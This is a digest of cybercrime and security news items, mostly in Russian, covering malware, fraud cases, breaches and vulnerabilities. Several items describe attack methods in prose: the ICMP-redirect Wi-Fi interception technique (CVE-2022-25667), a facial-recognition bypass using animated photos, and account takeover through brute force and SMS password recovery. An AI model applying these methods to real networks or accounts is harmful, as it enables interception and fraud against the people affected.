По данным фактам возбуждены уголовные дела по признакам преступления, предусмотренного частью 2 статьи 159 Уголовного кодекса Российской Федерации. Расследование продолжается.
Региональное представительство криптовалютной биржи Binance согласилось делиться информацией о клиентах из России с Росфинмониторингом и ФСБ в обмен на помощь в ведении бизнеса на территории государства. Об этом пишет Reuters со ссылкой на бывших сотрудников компании и другие осведомленные источники.
ForkLog отправил в Binance запрос на комментарий.
Согласно агентству, в апреле 2021 года региональный директор Binance Глеб Костарев, который на тот момент занимал должность директора в Восточной Европе, провел встречу с представителями Росфинмониторинга.
Костарев якобы согласился делиться данным клиентов и создать в России местное подразделение, через которое власти могут запрашивать доступ к этой информации. В разговоре со своим партнером он подчеркнул, что ему «не оставили большого выбора».
В указанный период Росфинмониторинг пытался отследить криптовалютные донаты, направленные оппозиционному политику Алексею Навальному.
В разговоре с Reuters представитель Binance отметил, что власти РФ не обращались в компанию по вопросам, связанным с Навальным. По его словам, биржа стремится соблюдать законодательства юрисдикций, в которых работает, — это включает реагирование на «соответствующие запросы регуляторов и правоохранительных органов».
source: reuters.com/technology/how-crypto-giant-binance-built-ties-russian- fsb-linked-agency-2022-04-22/
Доступность квантовых процессоров позволит значительно ускорить внедрение квантовых вычислений.
Нидерландский стартап QuantWare решил изменить правила игры на рынке квантовых
вычислений и объявил о намерении выпустить свой процессор Soprano в свободную
продажу.
Продукт могут приобрести любые коммерческие учреждения, частные лаборатории и
учебные заведения. Маттейс Райлаарсдам, являясь соучредителем QuantWare,
заявил, что «наш Soprano QPU — это то, чем Intel 4004 был для
полупроводникового бизнеса».
Предлагаемый для приобретения 5-кубитный квантовый процессор Soprano
собственной разработки QuantWar выполнен на трансмонах – зарядовых кубитах на
основе сверхпроводящих проводников, обеспечивающих значительное снижение
чувствительности к зарядовому шуму. Аналогичные технологии используются в
квантовых системах Google, IBM и Rigetti.
Точность каждого кубита составляет 99,9% в течении 10мс. Заказчикам процессоры
будут предлагаться как уже в полностью готовом варианте, так и с возможностью
настройки необходимых характеристик в зависимости от требований заказчика.
QuantWare сообщила, что намерена наращивать количество кубитов в своих
процессорах вдвое или даже вчетверо каждый год. В 2025 году QuantWare ожидает
некую переломную точку, после которой квантовые компьютеры станут более
распространёнными.
В Варшаве задержали 20-летнего белоруса, который подозревается в мошенничестве, совершенном удаленно с использованием новых технологий.
Наличные, изъятые правоохранительными органами у предполагаемого мошенника. Фото: полиция Польши.
В августе в отделение полиции города Отвоцк поступило заявление от мужчины, ставшего жертвой обмана. Злоумышленники, представившись сотрудниками банка, сообщили, что его деньги находятся под угрозой. В результате потерпевший потерял 31 800 злотых (около 7,4 тыс. долларов). Через несколько дней следователи установили личность еще одной жертвы, которая лишилась более 19 500 злотых (около 4,5 тыс. долларов).
Полицейские отследили путь денег, что в сочетании с современными методами работы привело их к месту, где находился предполагаемый мошенник. В результате в районе «Прага-Пулноц» в Варшаве они задержали белоруса.
В ходе обыска правоохранители изъяли наличные в размере 45 370 злотых, 210 евро и 1772 долларов, а также банковские карты и мобильный телефон.
Задержанному предъявили обвинения по двум фактам мошенничества, за которые грозит до 8 лет лишения свободы. Он признал себя виновным в одном из них. К нему применена мера пресечения в виде временного заключения под стражу на три месяца.
На прошлой неделе сообщалось, что вредоносное ПО SpinOk проникло в Google Play, и суммарно зараженные им приложения были загружены более 421 млн раз. Теперь эксперты выявили новую партию приложений с этой малварью, которые были установлены еще 30 млн раз.
Впервые SpinOK был обнаружен аналитиками компании «Доктор Веб». Специалисты рассказывали, что вредонос распространяется под видом маркетингового SDK, и заразил таком образом множество приложений.
Стоит отметить, что разработчики этих приложений, скорее всего, использовали
вредоносный SDK, считая его обычной рекламной библиотекой и не подозревая о
вредоносных функциях.
Малварь предназначена для удержания пользователей в приложениях с помощью
мини-игр, систем заданий, а также якобы розыгрышей призов. На деле она
обладает шпионскими функциями: собирает в фоновом режиме информацию о
хранящихся на устройствах файлах, может передавать их злоумышленникам, а также
способна подменять и загружать содержимое буфера обмена на удаленный сервер.
Как теперь сообщили исследователи из компании
[CloudSEK](https://www.cloudsek.com/threatintelligence/supply-chain-attack-
infiltrates-android-apps-with-malicious-sdk), они использовали индикаторы
компрометации, предоставленные «Доктор Веб», и сумели обнаружить еще одну
партию из 92 зараженных SpinOk приложений. То есть в сумме выявлено уже 193
вредоносных приложения.

Самым загружаемым среди обнаруженных CloudSEK приложений стало HexaPop Link
2248, насчитывавшее более 5 млн установок (в настоящее время уже удалено из
Google Play). Среди прочих популярный приложений, использующих SpinOk SDK,
были:
По данным CloudSEK, общее количество загрузок вредоносных приложений превысило 30 000 000.
Фигуранты взламывали страницы пользователей соцсетей и от их имени просили друзей о финансовой помощи. Таким образом они присвоили более 500 тысяч гривен.
Преступную "схему" разоблачили работники Департамента киберполиции совместно с территориальным подразделением в Сумской области и работниками Главного управления Нацполиции области.
Пятеро местных жителей взламывали страницы в соцсетях граждан, используя метод грубого перебора паролей (атаки Brute Force). Кроме этого, они покупали у мобильных операторов номера, которые проверяли на верификацию в соцсетях. В случае, если номера были привязаны к соцсетям, злоумышленники использовали функцию восстановления пароля с помощью SMS.
Получив доступ к аккаунтам потерпевших, рассылали сообщения их друзьям с просьбой одолжить деньги. По предварительным подсчетам, таким образом злоумышленники присвоили более половины миллиона гривен.
Правоохранители провели пять обысков в домах фигурантов и изъяли мобильные телефоны, компьютерную технику, SIM-карты, использовавшиеся в противоправной деятельности.
Открыто уголовное производство по ч. 2 ст. 361 (Несанкционированное вмешательство в работу компьютеров, автоматизированных систем, компьютерных сетей или сетей электросвязи), ч. 3 ст. 190 (Мошенничество) Уголовного кодекса Украины. Злоумышленникам может грозить до восьми лет лишения свободы.
Следствие продолжается.
Хакерские взломы, осуществленные Россией и Китаем в отношении широкого круга правительственных и промышленных объектов в США - и неспособность американских разведывательных агентств их обнаружить - заставляют администрацию Байдена и Конгресс пересмотреть то, как стране следует защищать себя от растущих киберугроз. Оба взлома использовали одну и ту же зияющую уязвимость в существующей системе: они были запущены с территории Соединенных Штатов - на серверах, управляемых Amazon, GoDaddy и более мелкими внутренними провайдерами
"Но ФБР и Министерство внутренней безопасности США - два агентства, которые могут действовать в США на законных основаниях - также не видели того, что произошло, что вызывает дополнительную озабоченность по поводу способности страны защищаться как от соперничающих правительств, так и от негосударственных злоумышленников, таких как преступные и террористические группы, - говорится в статье. - В итоге взломы были обнаружены спустя много времени после того, как они были начаты, не каким-либо государственным учреждением, а частными фирмами по компьютерной безопасности".
"Когда не один, а два кибервзлома остались незамеченными федеральным правительством за такой короткий период времени, сложно утверждать, что у нас нет проблемы, - заявил конгрессмен Майк Галлахер, республиканец от штата Висконсин и сопредседатель уполномоченной Конгрессом комиссии по киберпространству. - Система подает тревожные сигналы".
"Неудачи побудили Белый дом начать оценку вариантов капитального пересмотра киберзащиты страны, хотя правительство еще продолжает расследование взломов. По мнению некоторых бывших чиновников, взломы показывают, что Конгрессу необходимо наделить правительство дополнительными полномочиями. Но в пятницу, предоставляя журналистам информацию о ходе расследования, высокопоставленные представители администрации заявили, что Белый дом не планирует призывать Конгресс переписывать законы, запрещающие американским разведывательным агентствам действовать внутри границ Америки", - подчеркивает газета.
"Один высокопоставленный советник президента Байдена заявил, однако, что необходима новая структура, сочетающая традиционный сбор разведывательной информации с талантами компаний частного сектора", - пишет The New York Times, напоминая, что "атаку SolarWinds, организованную Россией, в конечном итоге, обнаружила FireEye, компания по кибербезопасности", а "небольшая фирма из Вирджинии под названием Volexity сообщила Microsoft тот факт, что китайские хакеры обнаружили четыре ранее неизвестных уязвимости в ее системах, подвергнув опасности сотни тысяч компьютерных серверов, которые используют программное обеспечение Microsoft Exchange".
"Байден был проинформирован на прошлой неделе об усилиях по залатыванию дыр в федеральной обороне, сообщил журналистам в пятницу высокопоставленный чиновник администрации, добавив, что федеральное правительство уже третью неделю в ходе длящихся месяц усилий пытается заткнуть дыры, вскрытые взломом SolarWinds. Скоро будет обнародован президентский указ о долгосрочных решениях", - информирует издание.
"Но первая проблема - это обнаружение атак - и в этом США предстоит проделать огромную работу. Ведущие американские хакерские команды и цифровые защитники базируются в Форт-Миде, штат Мэриленд, где находится АНБ и его военный аналог, Киберкомандование США. В течение более чем десяти лет, потратив миллиарды долларов на новые технологии, они наводняют зарубежные сети различными формами "маяков", которые дают им доступ для обнаружения атак, когда они готовятся или начинаются, - говорится в публикации. - Но, как и противоракетная оборона, это вряд ли непроницаемый щит. И иностранные игроки определили слепое пятно Америки: если хакеры смогут организовать атаку изнутри Америки, лучшие охотничьи группы правительства США могут прошляпить ее".
"АНБ не может действовать во внутренней инфраструктуре, - констатировал в пятницу в адмирал в отставке Майкл С. Роджерс, бывший директор агентства, в Школе управления Келлога Северо-Западного университета. - Нельзя защищаться от чего-то, чего вы не видите".
"Однако политического аппетита отменять десятилетия ограничений, наложенных на разведывательные агентства в области мониторинга и защиты сетевого трафика внутри США, не наблюдается. Вместо этого чиновники администрации Байдена заявили, что будут стремиться к более глубокому партнерству с частным сектором, используя знания о возникающих хакерских угрозах, собираемые технологическими компаниями и фирмами, занимающимися кибербезопасностью", - указывает газета.
"По словам нынешних и бывших чиновников, есть надежда на создание механизма обмена угрозами в режиме реального времени, при котором частные компании будут отправлять данные об угрозах в центральное хранилище, где правительство могло бы связывать их с разведданными АНБ, ЦРУ и других шпионских агентств, чтобы выступать с предупреждениеи гораздо раньше, чем это возможно сегодня. "Можно надежно останавливать атаки, - считает Гленн С. Герстелл, бывший главный юрисконсульт АНБ. - Нам нужен способ получать информацию об угрозах в единый универсальный центр".
"Вопрос в том, как настроить такую систему", - пишет издание.
"После разоблачения в 2013 году бывшего контрактника разведки Эдварда Дж. Сноудена, вызвавшего дебаты о правительственной слежке, американские технологические компании опасаются создавать впечатление обмена данными с американскими разведывательными агентствам, даже если эти данные представляют собой просто предупреждения о вредоносном ПО. Google был поражен раскрытием информации в документах Сноудена о том, что АНБ перехватывает данные, передаваемые между его серверами, находящимися за границей. Несколько лет спустя под давлением сотрудников компания прекратила свое участие в Project Maven - попытке Пентагона использовать искусственный интеллект для повышения точности своих дронов", - отмечается в публикации.
"Amazon, напротив, не питает таких опасений по поводу деликатной правительственной работы: компания управляет операциями облачного сервера для ЦРУ. Но когда в прошлом месяце комитет Сената по разведке попросил представителей компании дать показания - вместе с руководителями FireEye, Microsoft и SolarWinds - о том, как русские использовали системы на американской территории для проведения своих атак, они отказались присутствовать", - указывает издание.
"Компании заявляют, что прежде, чем они будут делиться докладами об уязвимостях, им потребуется надежная защита правовая защита. Наиболее приемлемой с политической точки зрения штаб-квартирой для такого информационного центра - чтобы избежать юридических проблем и проблем, связанных с гражданскими свободами, было бы Агентство кибербезопасности и безопасности инфраструктуры Министерства внутренней безопасности. Герстелл описывает эту идею как "автоматизированные компьютерные сенсоры и искусственный интеллект, который действует в зависимости от информации, когда она поступает, и мгновенно выдает ее обратно".
"Существующая в ведомстве система "Эйнштейн", которая должна отслеживать вторжения и потенциальные атаки на федеральные агентства, не зафиксировала проведение российской атаки, хотя та затронула девять федеральных министерств и агентств. Законодатели заявляют, что ФБР не имеет широких возможностей мониторинга, и внимание бюро сосредоточено на других формах преступности, борьбе с терроризмом, а теперь и угрозах внутреннего экстремизма".
"Есть и другие препятствия. По словам Герстелла, процесс получения ордера на обыск слишком сложен для отслеживания кибератак со стороны государств. "Кто-то должен иметь возможность получить эту информацию от АНБ и немедленно взглянуть на тот компьютер, - сказал он. - Но ФБР для этого нужен ордер, а для этого нужно время, и к тому моменту противник ускользнет".
"Еще одно препятствие - медленное выявление злоумышленников. Хотя директор национальной разведки пришел к выводу, что атака SolarWinds, совершенная в прошлом году, "вероятно", была российской по происхождению, окончательная оценка появится не ранее этой или следующей недели. Только тогда США смогут ответить санкциями или кибероперациями - почти через год после начала атаки. "В обоих случаях меня тоже беспокоит то, как медленно мы склонны выявлять ответственных и реагировать", - сказал Галлахер.
• Source: <https://www.nytimes.com/2021/03/14/us/politics/us-hacks-china- russia.html>
Как стало известно в начале текущей недели, неизвестные злоумышленники сумели скомпрометировать онлайн-платформу для тестирования ПО Codecov и добавили сборщик учетных данных к одному из инструментов. Компрометация коснулась продукта Bash Uploader, который позволяет клиентам Codecov передавать отчеты о покрытии кода для анализа.
Хакер получил доступ к скрипту Bash Uploader 31 января 2021 года и постепенно вносил в него изменения, добавляя вредоносный код, который перехватывал загрузки, обнаруживал и собирал любую конфиденциальную информацию, включая учетные данные, токены и ключи. Точкой входа для злоумышленника стала ошибка, допущенная разработчиками в процессе создания образа Docker Codecov, которая позволила хакеру извлечь учетные данные, необходимые для внесения изменений в скрипт Bash Uploader.
Взлом был обнаружен только 1 апреля 2021 года, и разработчики, вместе со сторонними криминалистами занимаются расследованием инцидента. Как сообщает Reuters, теперь исследователи пришли к выводу, что инцидент затронул сотни клиентских сетей, то есть атака была куда масштабнее, чем предполагалось изначально.
Проблема в том, что Codecov используют более 29 000 клиентов, в том числе такие известные компании, как GoDaddy, Atlassian, The Washington Post, Procter & Gamble (P&G) и так далее. По данным федеральных властей США, которые уже расследуют случившееся, злоумышленники использовали похищенные учетные данные клиентов для доступа к сотням сетей.
«Хакеры приложили дополнительные усилия, чтобы использовать Codecov для проникновения в сети других производителей ПО, а также компаний, которые сами предоставляют другим свои технологические услуги, включая IBM», — рассказал изданию анонимный источник, близкий к расследованию.
Click to expand...
Bleeping Computer пишет, что список компаний и проектов на GitHub, использующих Codecov, обширен, и простой поиск ссылки скомпрометированного скрипта Bash Uploader позволяет выявить тысячи проектов, которые использовали или используют этот скрипт.

И хотя точный масштаб инцидента пока неизвестен, представители Atlassian и Hewlett Packard Enterprise уже сообщили журналистам, что провели проверки и не обнаружили никаких признаков компрометации своих систем.
Источник: xakep.ru/2021/04/21/codecov-hack/
An investigation into stolen subscription service credentials by the Australian Federal Police (AFP) has resulted in a two years and two months' sentence for a man from Sydney.
The 23-year-old was handed the sentence, to be served by way of an intensive corrections order, for his involvement as the creator, administrator, and primary financial beneficiary of a number of online subscription services which relied on stolen credentials.
He has also been ordered by the court to serve 200 hours of community service.
The sentencing follows the execution of a search warrant in March at a Dee Why residence, which resulted in the seizure of a laptop that was used to run the operation and around AU$35,000 in cryptocurrency.
The combined assets of the restrained property has a current value of approximately AU$1.65 million.
The investigation began after the Federal Bureau of Investigation (FBI) referred information to the AFP in May 2018.
The information, AFP said, was regarding an account generator website called WickedGen.com. WickedGen operated for approximately two years selling stolen account details for online subscription services, including Netflix, Spotify, and Hulu.
The AFP said it further identified the Sydney man to be the creator, administrator, and primary financial beneficiary of a further three "account generator" websites: HyperGen, Autoflix, and AccountBot.
The account details of users in Australia and abroad were confirmed through credential stuffing -- which allows a list of previously stolen or leaked usernames, email addresses, and corresponding passwords to be re-used -- and sold for unauthorised access.
According to the AFP, across the four subscription services, the offender had at least 152,863 registered users and provided at least 85,925 subscriptions to illegally access legitimate streaming services.
The man received at least AU$680,000 through PayPal, the AFP said, by selling subscriptions through these sites.
"The harvesting and selling of personal details online was not a 'victimless crime' -- these were the personal details of everyday people being used for someone's greed," AFP cybercrime operations commander Chris Goldsmid said.
"These types of offences can often be a precursor to more insidious forms of data theft and manipulation, which can have greater consequences for the victims involved."
The operation was undertaken by the AFP-led Criminal Assets Confiscation Taskforce (CACT).
The CACT was formed in 2011 as part of a multi-agency crackdown on criminal assets, and comprises of the AFP, Australian Criminal Intelligence Commission, Australian Taxation Office, Australian Transaction Reports and Analysis Centre, and Australian Border Force.
The man was charged with "unauthorised access to (or modification of) restricted data, dealing in proceeds of crime etc." -- money or property worth $100,000 or more, providing a circumvention service for a technological protection measure, and dealing in identification information and false or misleading information.
При процессуальном руководстве Ровенской областной прокуратуры следователями Управления СБ в Ровенской области осуществляется досудебное расследование в уголовном производстве по факту несанкционированного функционирования сети аппаратно-программных комплексов (ч.2 ст. 361 УК Украины).
В ходе следствия установлено, что указанные АПК используются, как «ботофермы» для незаконной подмены телефонного трафика с целью переадресации звонков для их дальнейшей анонимизации, а также для анонимного создания аккаунтов в социальных сетях для распространения фейковой информации в ущерб авторитету и государственной безопасности Украины (распространение ложных сообщений о минировании, осуществление специальных информационных акций в интересах иностранных государств).
Для функционирования «ботоферм» злоумышленники использовали, кроме украинских, также SIM-карты иностранных мобильных операторов (в т.ч. Российской Федерации)
10 августа правоохранителями проведен санкционированный обыск в одном из населенных пунктов Радомышльского района Житомирской области, в ходе которого обнаружено и изъято оборудование, которое использовалось для противоправной деятельности: 9 VoIP шлюзов на 32 порта каждый, и более 4 200 сим-карт мобильных операторов связи.
Сейчас решается вопрос о наложении ареста на это имущество, а также устанавливаются лица, причастные к противоправной деятельности.
Санкция статьи предусматривает наказание в виде лишения свободы на срок от 3 до 6 лет с лишением права занимать определенные должности или заниматься определенной деятельностью на срок до трех лет.
• Source: [https://rivne1.tv/news/126932-pravo...uvali-ddosataki-na- pidpriemstva-rivnenshchini](https://rivne1.tv/news/126932-pravookhorontsi- viyavili-botofermu-z-yakoi-zdiysnyuvali-ddosataki-na-pidpriemstva- rivnenshchini)

](https://www.safebreach.com/resources/blog/remote-access-trojan-coderat/)
Dubbed CodeRAT, the new RAT is used in attacks targeting Farsi-speaking code developers using a Microsoft Dynamic Data Exchange (DDE) exploit.
 www.safebreach.com
Группа исследователей из университетов Цинхуа (Китай) и Джорджа Мейсона (США) раскрыла информацию об уязвимости (CVE-2022-25667) в беспроводных точках доступа, позволяющую организовать перехват трафика (MITM) в беспроводных сетях, защищённых с использованием протоколов WPA, WPA2 и WPA3. Через манипуляцию ICMP-пакетами с флагом "redirect" атакующий может добиться перенаправления трафика жертвы внутри беспроводной сети через свою систему, что может применяться для перехвата и подмены незашифрованных сеансов (например, запросов к сайтам без HTTPS).
Уязвимость вызвана отсутствием должной фильтрации фиктивных ICMP-сообщений с подменённым адресом отправителя (спуфинга) в сетевых процессорах (NPU, Network Processing Unit), обеспечивающих низкоуровневую обработку пакетов в беспроводной сети. Среди прочего NPU перенаправляли без проверки на спуфинг фиктивные ICMP-пакеты с флагом "redirect", которые можно использовать для изменения параметров таблиц маршрутизации на стороне пользователя-жертвы. Атака сводится к отправке ICMP-пакета от имени точки доступа с флагом "redirect" с указанием фиктивных данных в заголовке пакета. Из-за уязвимости сообщение перенаправляется точкой доступа и обрабатывается сетевым стеком жертвы, считающим, что сообщение отправлено точкой доступа.
Дополнительно исследователями предложен метод для обхода проверок ICMP-пакетов с флагом "redirect" на стороне конечного пользователя и изменения его таблицы маршрутизации. Для обхода фильтрации предварительно атакующий определяет активный UDP-порт на стороне жертвы. Находясь в той же беспроводной сети атакующий может перехватывать трафик, но не может его расшифровать, так как не знает сессионный ключ, используемый при обращении жертвы к точке доступа. Тем не менее, отправляя жертве проверочные пакеты атакующий на основе анализа поступающих ICMP-ответов с флагом "Destination Unreachable" может определить активный UDP-порт. Далее, атакующий формирует ICMP-сообщение с флагом "redirect" и поддельным UDP-заголовком, в котором указан выявленный открытый UDP порт. Обработка данного сообщения приводит к искажению таблицы маршрутизации в системе жертвы и перенаправления трафика с возможностью его перехвата в открытом виде на канальном уровне.
Наличие проблемы подтверждено в точках доступа, использующих чипы производства HiSilicon и Qualcomm. Изучение 55 различных моделей точек доступа от 10 известных производетелей (Cisco, NetGear, Xiaomi, Mercury, 360, Huawei, TP- Link, H3C, Tenda, Ruijie) показало, что все они подвержены уязвимости и не блокируют поддельные ICMP-пакеты. Кроме того, при анализе 122 существующих беспроводных сетей было выявлена возможность проведения атаки в 109 сетях (89%).
Для эксплуатации уязвимостей атакующий должен иметь возможность легитимного подключения к Wi-Fi сети, т.е. должен знать параметры входа в беспроводную сеть (уязвимости позволяют обойти применяемые в протоколах WPA* механизмы разделения трафика пользователей внутри сети). В отличие от традиционных MITM- атак на беспроводные сети, используя технику спуфинга ICMP-пакетов, атакующий может обойтись без развёртывания своей фиктивной точки доступа для перехвата трафика и воспользоваться обслуживающими сеть легитимными точками доступа для перенаправления жертве специально оформленных ICMP-пакетов.
• Video: <https://wifi-interception.github.io/resources/wifi-eng-noppt-mask- LAN.mp4>
Открытые проекты Tor Project и Tails объявили о слиянии. Как говорится в сообщении на сайте Tor, это поможет командам совместно противостоять угрозам цифровой слежки и цензуры в интернете.
«Мы чувствуем, что возвращаемся домой после долгих лет работы на самостоятельной основе», — прокомментировал принятое решение представитель Tails.
Ключевыми задачами объединения называются укрепление защиты от слежки и цензуры в интернете, упрощение сотрудничества между проектами и снижение затрат на их администрирование, улучшение образовательных программ для пользователей, расширение возможностей для активистов, журналистов и всех, кто нуждается в безопасности в интернете, а также интеграция ресурсов и повышение узнаваемости Tails через платформу Tor. Возглавят новую команду двое уже действующих управленцев — Изабель Рафальски из Tor Project и Рут Стейнбергер из Tails.Click to expand...
Отмечается, что команды уже давно помогают друг другу работать над защитой пользователей. Первый совместный проект был реализован еще в 2015 году. Фактически, Tor Project разрабатывает инструменты, необходимые для обеспечения анонимности, а Tails, являющийся продолжением операционной системы Incognito, предоставляет дистрибутив, помогающий пользователям оставаться невидимыми в сети. Также он блокирует соединения, которые считает не анонимными, и шифрует пользовательские данные.
blog.torproject.org/tor-tails-join-forces
Задержанные по подозрению в интернет-мошенничестве оказались уроженцами африканских стран
«Сразу в двух регионах России полицейскими задержаны подозреваемые в интернет- мошенничестве. По версии следователей, проживавшие в России уроженцы африканских стран нашли потерпевших на сайтах знакомств.
На территории Московской области оперативники из Марий Эл задержали 50-летнего мужчину. Предварительно установлено, что гражданин Республики Камерун вступил в переписку по электронной почте с 58-летней пенсионеркой из поселка Медведево. Женщине он написал о том, что якобы служит в Афганистане дипломатическим атташе при посольстве одной из зарубежных стран.
Через некоторое время виртуальный знакомый сообщил, что на их представительство напали, и из соображений безопасности он хочет передать принадлежащие ему вещи в нейтральную страну. Доверчивая гражданка согласилась принять посылку, расходы на доставку которой отправитель обещал взять на себя.
Вскоре от имени курьерской компании женщина получила письмо о том, что пересылка груза оплачена не полностью. Она внесла на указанный в сообщении счет требуемую сумму, но этого оказалось недостаточно. Затем пенсионерка стала регулярно получать информацию о других проблемах своего нового знакомого, решение которых также требовало финансовых вложений. В течение десяти месяцев потерпевшая сделала около тридцати переводов на общую сумму более 1 млн 900 тысяч рублей. Зарубежный друг обещал, что вернет все потраченное, но вскоре перестал отвечать на звонки и отправленные на электронную почту письма.
После того как подозреваемый был задержан полицейскими, во время обыска в его квартире в городе Люберцы были обнаружены и изъяты 7 камерунских паспортов на разные имена, 22 банковские карты и 16 мобильных телефонов.
Аналогичный случай произошел с 60-летней жительницей Республики Саха (Якутия). Через интернет-сервис она познакомилась с мужчиной, который представился бизнесменом из Объединенных Арабских Эмиратов. После непродолжительной переписки он признался женщине в любви и предложил замужество. Новый знакомый сообщил, что в качестве доказательства серьезных намерений отправляет ей посылку с дорогостоящими ювелирными украшениями.
Через некоторое время жительница Якутии начала получать звонки о проблемах с пересылкой. Люди, которые представлялись сотрудниками таможни и транспортной компании, требовали оплатить налоги, страховки, штрафы и иные расходы. Чтобы получить посылку, женщина одолжила деньги у знакомых и взяла в банке кредит, после чего перевела на указанные в письмах счета в общей сложности 590 тысяч рублей. После перечисления денег зарубежный поклонник перестал выходить на связь.
Подозреваемый был задержан на территории города Курска сотрудниками отдела МВД России по Намскому району Республики Саха (Якутия). Им оказался 31-летний гражданин Нигерии, который обучается в аспирантуре местного вуза по специальности «Экономика».
В отношении задержанных сотрудниками следственных подразделений региональных МВД возбуждены уголовные дела по признакам преступлений, предусмотренных статьей 159 УК РФ. Им избрана мера пресечения в виде заключения под стражу.
Проводятся оперативно-розыскные мероприятия и следственные действия, направленные на установление других возможных эпизодов противоправной деятельности задержанных».
В США предъявлены обвинения в электронном мошенничестве и краже персональных данных 19-летнему жителю штата Флорида Ною Майклу Урбану (Noah Michael Urban), известному под никами a/k/a “Sosa,” a/k/a “Elijah,” a/k/a “King Bob,” a/k/a “Anthony Ramirez.
Молодой человек с августа 2022 года по март 2023-го с помощью подмены сим-карт украл деньги лишь у пяти человек, став богаче на 800 тысяч долларов.
Отмечается, что Урбана обвиняют по одному пункту о сговоре с целью совершения электронного мошенничества, восьми пунктам, связанным с электронным мошенничестве и пяти пунктам о краже личных данных при отягчающих обстоятельствах.
В случае признания виновным американцу грозит до 20 лет лишения свободы по каждому из пунктов, связанных с мошенничеством. Кроме того, он гарантированно будет приговорен к двум годам тюрьмы за кражу персональных данных при отягчающих обстоятельствах, если его вина будет доказана.
sc: justice[.]gov/usao-mdfl/pr/palm-coast-man-arrested-wire-fraud-and- aggravated-identity-theft-charges
Суд в Рио-де-Жанейро потребовал от основателя GAS Consultoria Глэйдсона Акасио дос Сантоса внести депозит в размере 19 млрд бразильских реалов (~$3,7 млрд). Средства направят на выплату компенсаций жертвам криптовалютного мошенничества, пишет O Globo.
Решение вынесли 19 сентября. На его исполнение Сантосу отвели 72 часа.
В августе 2021 года основателя GAS Consultoria арестовали в ходе операции Kryptos, связанной с предполагаемой финансовой пирамидой. По версии следствия, Сантос выступал организатором схемы — ее жертвам предлагали доходность до 15% годовых.
Тогда полиция изъяла криптовалюту на сумму 150 млн реалов ($28,7 млн), $3,6 млн наличными, 21 премиум-автомобиль и различные ювелирные изделия.
По данным издания, от действий мошенников пострадали более 122 000 инвесторов. Власти также обвинили Сантоса в совершении тяжких преступлений, в том числе убийстве.
source: oglobo.globo.com/rio/noticia/2022/09/com-mais-de-122-mil-investidores- para-pagar-farao-dos-bitcois-tem-72-horas-para-depositar-r-19-bilhoes-na- justica.ghtml
Хакеры используют скиммеры для заражения сайтов электронной коммерции.
Согласно новому отчету Recorded Future, хакеры используют контейнеры Google Tag Manager (GTM) для установки скиммеров, которые крадут данные платежных карт и личную информацию покупателей на e-commerce сайтах.
Сайты электронной коммерции используют контейнеры Диспетчера тегов Google для данных о показателях использования веб-сайтов, отслеживания клиентов и маркетинговых целей.
Эксперты Recorded Future обнаружили 3 варианта вредоносных скриптов, которые киберпреступники прячут в контейнерах GTM, что позволяет им эксфильтровать личную информацию покупателей. Исследователи обнаружили более 165 000 записей о платежных картах жертв, которые были размещены на торговых площадках дарквеба.
Согласно отчету, скиммерами заражены 569 доменов. 314 заражены вариантом электронного скиммера на основе GTM, а 255 содержат вредоносное ПО, которое эксфильтрует украденные данные на вредоносные домены, связанные со злоупотреблением GTM. Исследователи также заявили, что в среднем для устранения заражения требуется более трех месяцев.
Злоупотребляя законными инструментами, такими как GTM, хакеры могут обойти ПО безопасности, которое часто не сканирует контейнеры GTM, потому что администраторы веб-сайтов обычно вносят в белый список доверенные исходные домены, особенно те, которые исходят от Google.
Recorded Future заявила, что начала отслеживать использование трех вариантов электронного скиммера на основе GTM с марта 2021 года и отметила, что с тех пор новые зараженные домены появляются каждый месяц.
source: recordedfuture.com/threat-actors-continue-to-abuse-google-tag-manager- for-payment-card-e- skimming?__hstc=156209188.fff33259a40815a920d843a82702a2e6.1660906682913.1663658733098.1663745470057.10&__hssc=156209188.1.1663745470057&__hsfp=3653501787
A remote code execution vulnerability could be exploited over the SSH protocol
to run malicious code in a SolarWinds application.
American IT company SolarWinds has released fixes for a zero-day vulnerability
in Serv-U file transfer technology, which is actively used in hacker attacks.
A remote code execution vulnerability discovered by Microsoft (CVE-2021-35211) can be exploited via SSH to run malicious code in an elevated SolarWinds application. With its help, attackers can install and run programs, view, modify and delete data.
According to the manufacturer, the problem affects only the Serv-U Managed File Transfer and Serv-U Secure FTP software, this vulnerability is absent in other products of the company. In particular, it is present in the Serv-U version 15.2.3 HF1 and earlier released on May 5, 2021.
When the attacks began through the vulnerability, neither SolarWinds nor Microsoft are reporting.
How many and which customers of SolarWinds were affected by its operation is unknown. “If you are an active supported user of SolarWinds Serv-U products, SolarWinds asks you to log in to the Customer Portal in order to receive updates. It will take only a few minutes to deploy the update.
If you are not an active supported user but are currently using a Serv-U product, our Customer Success team will help you with all your questions. Please open a service customer ticket with the theme "Serv-U Assistance" and our team will help you (no authorization required), "SolarWinds' notification says.

#442 · rust-lang/compiler-team ](https://github.com/rust-lang/compiler- team/issues/442)
Proposal rustc_codegen_gcc is a new code generation backend for rustc using the libgccjit library from GCC. (Despite its name, libgccjit works for ahead- of-time compilation as well.) rustc_codegen_...
github.com
Домодедовский городской суд Подмосковья вынес приговор двум участникам организованной группы хакеров Михаилу Кучеренко и Алексею Седунову, признанным виновными в неправомерном доступе к компьютерной информации и использовании и распространении вредоносных компьютерных программ. Об этом Агентству городских новостей «Москва» сообщили в пресс-службе прокуратуры Московской области.
Как выяснил суд, с июня по август 2016 года эти мужчины вместе с сообщниками распространили в сети вредоносное программное обеспечение.
«С его помощью злоумышленники получили неправомерный доступ к локальным компьютерным сетям ряда организаций в таких городах, как Москва, Тюмень, Ханты-Мансийск, Щелково и Домодедово. Они занимались несанкционированным копированием информации о различных платежах. Полученные данные позволили злоумышленникам похитить 5,9 млн руб.», - сказали в ведомстве.
Суд назначил Кучеренко и Седунову наказание каждому в виде шести лет лишения свободы условно с испытательным сроком на пять лет.
По информации китайского издания Xinhua, два гражданина Китая обошли государственную биометрическую систему проверки личности ради налогового мошенничества и создания фальшивых счетов.
По данным правоохранительных органов, обвиняемые использовали эту тактику с 2018 года. Дело в том, что в стране давно в ходу проверка личности с помощью распознавания лиц, и этот метод аутентификации используется как в повседневной жизни, для совершения розничных транзакций, так и для доступа к различным государственным услугам.
По данным СМИ, обойти биометрию оказалось совсем нетрудно: понадобилось фото высокого разрешения и популярное приложение, которое превращает фотографии в видео. Изображение обрабатывается таким образом, чтобы фотография "двигалась", с создается видео с нужными действиями, включая кивание, качание головой, моргание и открывание рта. Полученную фальшивку обвиняемые залили на специально подготовленный смартфон с "захваченной" камерой, и использовали фейк для обхода проверок и аутентификации по лицу.
